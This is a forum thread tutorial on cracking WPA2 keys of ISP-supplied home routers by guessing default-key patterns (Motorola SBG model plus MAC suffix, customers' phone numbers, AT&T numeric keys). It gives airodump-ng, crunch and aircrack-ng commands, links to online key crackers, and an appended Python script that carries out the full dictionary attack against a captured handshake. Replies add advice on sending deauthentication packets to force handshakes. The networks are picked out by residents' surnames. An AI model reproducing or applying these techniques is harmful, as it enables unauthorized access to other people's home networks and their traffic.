Crack WPA2: Know Your Target

Discussion in 'Dictionary, Password & Wordlists' started by ImJoJo, 14 Nov 2012.

  1. ImJoJo (VIP)

    UPDATED 1/7/2013
    I created a simple tutorial on a different approach to cracking WPA2 on specific ISPs such as Time Warner Cable (RoadRunner), Charter Cable, COX and Comcast.

    It may vary by where you live, but it is targeted at all cable companies that also offer telephone and internet services. You will have to do a bit of homework to make things easier for you, less time consuming, and to get a higher success rate.

    This is for educational purposes only!

    First we have to make sure we have a sniffing tool such as Airodump-ng or inSSIDer, as we will need to know the SSID, ESSID and the channel of the AP we want to attack.

    Once you have your tool ready to go, what you want to do is have it scan. In airodump-ng you type the following commands to get it into monitor mode:
    Code:
    sudo airmon-ng start wlanX
    The X above is a variable. In the terminal, your command should look like this (as an example):
    Code:
    airmon-ng start wlan1
    Start scanning the air for APs:
    Code:
    airodump-ng mon0
    Helpful Tip: To stop scanning press Ctrl + C

    With inSSIDer, at the top right simply choose the adapter and click on START. The cool thing about inSSIDer is that it gives you the vendor information (through the MAC address), which is one of the things we will be looking for to make the attack more effective and precise while making it less time consuming.

    [image: inSSIDer scan, sorted by vendor]

    Notice all the APs in the image above? How can we tell which is which? Simple!

    I have sorted them out by vendor. In this case we will try to crack one of the APs from the ISP TimeWarner (RoadRunner) (I did this with the owner's permission). 90% of the time TimeWarner (RoadRunner) tends to operate their APs on channel 1, but counting all the APs on channel 1 we can see a total of 8.

    They also use WPA2 encryption, so now we narrow things down to 4. To be more precise, we will narrow things down by vendor, in this case Gemtek Technology Co. Ltd., which is what TimeWarner (RoadRunner) uses.

    Another thing we can look at is that TimeWarner (RoadRunner) will use the customer's first or last name as the ESSID, making it still easier to spot. So now we narrow it down to 2 APs. Now we come to the conclusion that those 2 APs, operating on channel 1, under WPA2, with vendor Gemtek Tech. Co. Ltd., are from TimeWarner (RoadRunner).

    NOTE: Notice one of the 2 APs has the last name of the person while the other does not?

    What does that mean? One major weakness in TimeWarner (RoadRunner) is that the AP has been reset at some point for whatever reason, making it extremely vulnerable to a dictionary attack. Why? Unfortunately, when you reset the modem, by default the model of the modem is used as the ESSID.

    Yes, even though it shows Gemtek Tech. Co. Ltd. as the vendor, the actual gateway vendor is Motorola. As to why this is, I haven't looked into it, but don't get confused. I believe Gemtek is for LAN and Motorola is for WAN.

    Anyway, when you see an AP with Gemtek Tech. Co. Ltd. as vendor but with SBGxxxx as the ESSID, know this: they are giving you part of the passphrase. How much, to be exact? Well, every character is part of the passphrase. All you need to do is crack the remaining four. In this case the AP named SBG65800C is letting us know that SBG6580 is the model and SBG6580 is also half of the passphrase (KEY).

    [images: sbgtest3.png, sbgtest4.png]

    The other half is the second half of the WAN MAC address, with 0C being the last two characters. So what to do from here? Simple! Use Crunch and create a custom wordlist that starts with SBG6580 and ends with 0C.
    Code:
    ./crunch 13 13 0123456789ABCDEF -t SBG6580@@@@0C -o SBG.txt
    Notice the wordlist I created was not even 1MB.
    So after I created the wordlist I simply ran Aircrack-ng and attempted to crack the handshake, and the results were as expected. It took Aircrack-ng only 20 seconds to find the key. This applies only to Motorola.

    If you use airodump-ng you can go to http://www.macvendorlookup.com/ and simply type the first 6 characters and it will tell you which vendor it is. I would also like to point out that not all APs with TimeWarner (RoadRunner) will have Gemtek as vendor, due to a feature that the Motorola SurfBoard has: MAC spoofing. But don't let that fool you.

    [image: scan showing ATTxxx and 2WIRExxx access points]

    Moving on to other ISPs, it just requires you to do a bit of research on your local ISPs. Some might have Charter, others might have Comcast or COX. Whichever it is, make sure to pay their support webpage a visit to see which vendors they carry. Some ISPs will let you know who they are, like in the image above. ATT576... can you guess? Ding ding ding! Yes, you got it right! It's AT&T. TimeWarner does not carry 2WIRExxx, and there are only 2 ISPs that cover that area, so from the image above we now know that the 2WIRExxx are also from AT&T. Also because they operate on channels 6 and 11, and TimeWarner (RoadRunner) only on channel 1.

    OK, so once you know how to tell them apart, one question arises: how will you attack it? Of course this tutorial is only for the dictionary attack, but you have to know which dictionary/wordlist you are going to use, because it is pointless to use a 50GB wordlist if the passphrase is only numbers. Cable companies that offer telephone service and internet will typically use the phone number as the KEY.

    So all you have to do is create a wordlist using the area code in which you live, and within an hour, BAMM! You have your KEY. To create a custom wordlist such as phone number and area code you have to use a tool such as Crunch, which already comes in BackTrack 5R3. Here is the command to create a wordlist such as the one we will need to crack an AP that uses the phone number as the passphrase (key).

    Code:
    /pentest/passwords/crunch/./crunch 10 10 1234567890 -t 878@@@@@@@ -o wordlist.txt
    Where -t 878 = your area code; change 878 to whatever the target AP's area code is. And -o wordlist.txt is the name of your wordlist, so you can change it to whatever you want, like -o arealist.txt.

    An alternative to saving a wordlist (though a wordlist using phone numbers is not big at all, not even 300MB) would be this amazing tutorial from mrmanuelmtzm, a member at xiaopan.co/forums. He posted that amazing tutorial using Aircrack-ng and Crunch without having to save the dictionary/wordlist to your flash drive or HDD. So it's pretty much a brute-force method. Pretty cool, huh!

    http://xiaopan.co/forums/threads/crunch-aircrack-ng-to-avoid-wordlists.809 Thanks mrmanuelmtzm!

    [image: aircrack-ng result showing the handshake and recovered key]

    Above you can see that a handshake has been acquired and the passphrase has been retrieved using a dictionary that I custom made for this specific AP. As you can see, it only took me 20 minutes and 40 seconds. Reaver could have taken longer. But knowing your target can save you lots of time.

    For ATTxxx APs many have thought that the phone number was used, but that is not true. It's a 10-digit number placed on a sticker on the modem, so to attack this AP I suggest using the Aircrack-ng + Crunch method above, due to the extremely large file that would be created (over 100GB).

    Attacking the well-known 2WIRExxx APs is almost the same as an ATT AP; the same method is suggested to attack this access point as with the ATTxxx, but you can use the link provided here to help out. It is a pretty cool online tool for many types of APs such as 2WIRExxx, 3Com, Arris, Asmax, Belkin, Cisco, Comtrend, DD-Wrt, DLink, EasyBox, Fibrehome, Huawei, MiFi, Motorola, Netgear, Pirelli, RuggedCom, Sagem, Seagate, Siemens, Thomson, TP-Link, TRENDnet, Ubiquiti, UTStarcom, Xavi, ZyXEL: http://routerpwn.com/

    For an alternative to that, check this out: http://xiaopan.co/forums/threads/android-thomson-key-solver.528 Thanks Mr. Penguin!

    Moving on to a different type of AP, this one we could say is the easiest to crack. Though it is not the dictionary attack that will be used, I thought it would be cool to write about it in this tutorial. Verizon FiOS: nearly 95% of their APs are WEP and are known by their easy-to-tell five-character ESSID.

    [image: scan showing Verizon FiOS access points]


    And notice the vendor, Actiontec Electronics Inc. As you may already know, WEP can be cracked in a matter of seconds. But there are two alternatives to crack these APs. There are many online tools like this one: http://aruljohn.com/fios/

    or you can download an app for your Android phone: http://xiaopan.co/forums/threads/vz-wifi-connect.560/

    You can also check out this FREE online WPA2 cracker; they also offer a paid service for those interested: http://gpuhash.com/?menu=en-tasks-add

    So always do your homework; find out a bit about the target AP. Don't just shoot blindfolded. Know what you're shooting at (figure of speech). But if you have the option of using Reaver 1.4, go ahead and use it, though at times a dictionary attack can be faster if you know more about your target, like the example shown above.

    Hope this tutorial helps in cracking WPA2 for those certain APs you've been looking to crack.
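
The two crunch masks in the post (SBG6580@@@@0C and 878@@@@@@@) are candidate generators; what aircrack-ng then does with each candidate is derive the PMK and KCK and recompute the handshake MIC. The script below is an added example, written by the editor and not part of the original post or the aircrack-ng project. It implements that check in Python so the derivation is visible, and drives it with generators equivalent to both masks (the phone generator enumerates the same 10^7 keys on the fly, which is the point of the linked Crunch + Aircrack-ng thread). Everything about the handshake is constructed: the SSID, both MAC addresses, the nonces and the EAPOL-Key message 2 bytes are made up so the script runs offline, and the key is placed near the start of the mask so the demo finishes in about a second. The MIC offset assumes a plain EAPOL-Key frame with no extra headers.

```python
"""Added example: WPA2-PSK dictionary attack driven by the ISP patterns in the post.

All handshake material here is constructed (SSID, MACs, nonces, EAPOL message 2);
PBKDF2, PRF-512 and the MIC check are the real 802.11i algorithms. aircrack-ng and
hashcat do exactly this per candidate, only much faster.
"""
import hashlib
import hmac
import itertools

# EAPOL hdr (4) + descriptor type (1) + key info (2) + key length (2) + replay (8)
# + nonce (32) + IV (16) + RSC (8) + ID (8) = 81 bytes before the MIC field
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes). This is the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 over the PMK; the first 16 bytes of the PTK are the KCK that keys the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the frame with its MIC field zeroed. Key-descriptor version 2 (CCMP/WPA2)
    uses HMAC-SHA1-128; version 1 (TKIP/WPA) uses HMAC-MD5, a common reason a checker
    'fails' on a WPA handshake."""
    version = eapol[6] & 0x07
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def check_candidate(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, eapol) -> bool:
    kck = ptk_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(kck, eapol), eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN])


# Candidate generators equivalent to the two crunch masks in the post.
def sbg_candidates(model="SBG6580", mac_tail="0C"):
    """crunch 13 13 0123456789ABCDEF -t SBG6580@@@@0C : 16^4 = 65,536 keys."""
    for mid in itertools.product("0123456789ABCDEF", repeat=4):
        yield model + "".join(mid) + mac_tail


def phone_candidates(area_code="878"):
    """crunch 10 10 1234567890 -t 878@@@@@@@ : 10^7 keys, generated without touching disk."""
    for rest in itertools.product("0123456789", repeat=7):
        yield area_code + "".join(rest)


def crack(candidates, ssid, ap_mac, sta_mac, anonce, snonce, eapol):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    for pw in candidates:
        if check_candidate(pw, ssid, ap_mac, sta_mac, anonce, snonce, eapol):
            return pw
    return None


# ---- constructed handshake (not a real capture) ----
SSID = "SBG65800C"                        # reset-default ESSID: model + last MAC octet
TRUE_KEY = "SBG6580013F0C"                # placed near the start of the mask for a quick demo
AP_MAC = bytes.fromhex("001d7e000000")    # placeholder values, not a real device
STA_MAC = bytes.fromhex("00aabbccddee")
ANONCE = hashlib.sha256(b"anonce").digest()
SNONCE = hashlib.sha256(b"snonce").digest()


def build_msg2(key: str) -> bytes:
    """Build EAPOL-Key message 2 (client -> AP, carries SNonce + MIC) as a capture would show it."""
    frame = (b"\x02\x03\x00\x5f"            # EAPOL v2, type Key, body length 95
             + b"\x02"                     # descriptor type: RSN
             + b"\x01\x0a"                 # key info: pairwise, MIC bit, version 2 (HMAC-SHA1)
             + b"\x00\x10"                 # key length 16
             + b"\x00" * 7 + b"\x01"       # replay counter
             + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
             + b"\x00" * MIC_LEN + b"\x00\x00")
    kck = ptk_kck(pmk_from_passphrase(key, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


EAPOL_MSG2 = build_msg2(TRUE_KEY)

if __name__ == "__main__":
    found = crack(sbg_candidates(), SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2)
    print("recovered key:", found)
```

Two things the script makes concrete that the post only states: the MIC check needs the AP MAC, the client MAC, both nonces and message 2 of the handshake, which is why a capture without a client reassociating is useless; and the cost per candidate is the 4096-round PBKDF2, so shrinking the keyspace with the ESSID and vendor clues (65,536 candidates instead of 16^13) is what turns a hopeless job into a 20-second one. For a real capture, feed the same generators to aircrack-ng (`-w -` reads candidates from stdin) or hashcat rather than this pure-Python loop.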
  2. estimacamry (VIP)

    ImJoJo
    Nice tutorial. I run BT5 on a live USB, so whatever has been done will not be saved. If I save the cap file to my external hard drive, can I run it against my wordlists when I'm on BT5 again at another time?
     
  3. ImJoJo (VIP)

    Thank you estimacamry! Many friends of mine have had lots of success as well by applying these rules. As to your question: yes, you can always save it to an external drive to try to crack it any time you want. There will be an update to this tutorial very soon. Keep posted! :D
     
  4. Shuren Flames

  5. ImJoJo (VIP)

    You're welcome! ;)
     
  6. kumakita

    Thanks for the answer.
     
  7. Crackerz Wave (Staff Member, Moderator, VIP)

    My new ISP in Malaysia provides an 8-digit PIN (all numbers), so I created the dictionary from 0x8 to 9x8, and you know what? It worked.

    The problem for me is getting the handshake, and a faster dictionary attack, as Reaver only tries the same PIN.
     
  8. ImJoJo (VIP)

    Let me see if I understood: the new ISP provides an 8-digit PIN or KEY? All WPS is 8 digits. If it's the KEY that is also 8 digits, you should try pyrit if you get the handshake; it's way faster than aircrack-ng. Something 8 characters on a dictionary attack should take an average time of about 30-45 mins on decent hardware.
     
  9. Crackerz Wave (Staff Member, Moderator, VIP)

    The ISP sets the default key as 8 digits. The problem for me is to get the handshake; if people use the network, then I can get the handshake.
     
  10. ImJoJo (VIP)

    Oh, that's not good. Sometimes clients won't show or they will take a while to appear. Try sending 5 deauthentication packets to the AP and hopefully they'll show. It sometimes works for me. :)
     
  11. -xyz

    Wow, nice thread. Could you give me any tips on creating a dictionary for Arris Group, Inc.?
     